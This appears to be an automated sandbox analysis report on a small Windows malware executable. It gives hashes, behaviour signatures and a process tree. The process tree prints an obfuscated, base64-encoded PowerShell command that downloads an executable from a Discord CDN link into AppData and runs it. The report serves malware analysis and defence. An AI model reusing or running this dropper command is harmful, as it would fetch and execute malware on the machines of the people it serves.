Analysis
-
max time kernel
30s -
max time network
33s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
-
submitted
17-03-2023 09:26
General
-
Target
9549168790bc8b01d0c889fccb01bd73.exe
-
Size
5KB
-
MD5
9549168790bc8b01d0c889fccb01bd73
-
SHA1
3e0091a6e3d0e793c28056a19bbd882ff6992dea
-
SHA256
5ab1b5c6441512297d7523334bdb92dbee7f35ad76901d7f199bc9d5a1223457
-
SHA512
1f6eb588a7c2eba76d98e2d4662f855c4936070a9cf713b29bd8354e3fa5a298ebf565f2e7bbb3b1f6ce03640120b44b87097d50824e2ab137a26f60c76314bf
-
SSDEEP
96:pdr479SSCFQQQ+tpwvk+JcAY+sGwvk+JwnSvFd3ojdrl:pdi9SZFVHcvk2YgwvkLaFdw
Score
8/10
Malware Config
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious use of WriteProcessMemory 3 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\9549168790bc8b01d0c889fccb01bd73.exe"C:\Users\Admin\AppData\Local\Temp\9549168790bc8b01d0c889fccb01bd73.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHcAbgBwACMAPgBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAAxADUAOwAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABGAGkAbABlACgAJwBoAHQAdABwAHMAOgAvAC8AYwBkAG4ALgBkAGkAcwBjAG8AcgBkAGEAcABwAC4AYwBvAG0ALwBhAHQAdABhAGMAaABtAGUAbgB0AHMALwAxADAAOAA0ADkAMQAwADEAOQA3ADcAMQA5ADQANAA5ADcAMwAzAC8AMQAwADgANAA5ADEAMAA0ADEAMwA5ADIAMwAyADQAMgAwADMANAAvAFMAZQBjAHUAcgBpAHQAeQBIAGUAbABhAHQAaABfAHAAcgBvAHQAZQBjAHQAZQBkAC4AZQB4AGUAJwAsACAAPAAjAGUAdQBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAdwBwAGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdABqAHkAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMwAuAGUAeABlACcAKQApADwAIwB4AGwAeAAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBhAG0AZgAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAdQBmAGgAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAMwAuAGUAeABlACcAKQA8ACMAagB5AHUAIwA+AA=="2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/920-59-0x000000001B1F0000-0x000000001B4D2000-memory.dmpFilesize
2.9MB
-
memory/920-60-0x0000000002470000-0x0000000002478000-memory.dmpFilesize
32KB
-
memory/920-61-0x0000000002520000-0x00000000025A0000-memory.dmpFilesize
512KB
-
memory/920-62-0x0000000002520000-0x00000000025A0000-memory.dmpFilesize
512KB
-
memory/920-63-0x0000000002520000-0x00000000025A0000-memory.dmpFilesize
512KB
-
memory/920-64-0x0000000002520000-0x00000000025A0000-memory.dmpFilesize
512KB
-
memory/920-65-0x0000000002520000-0x00000000025A0000-memory.dmpFilesize
512KB
-
memory/920-66-0x0000000002520000-0x00000000025A0000-memory.dmpFilesize
512KB
-
memory/920-67-0x0000000002520000-0x00000000025A0000-memory.dmpFilesize
512KB
-
memory/920-68-0x0000000002520000-0x00000000025A0000-memory.dmpFilesize
512KB
-
memory/1336-54-0x0000000000820000-0x0000000000828000-memory.dmpFilesize
32KB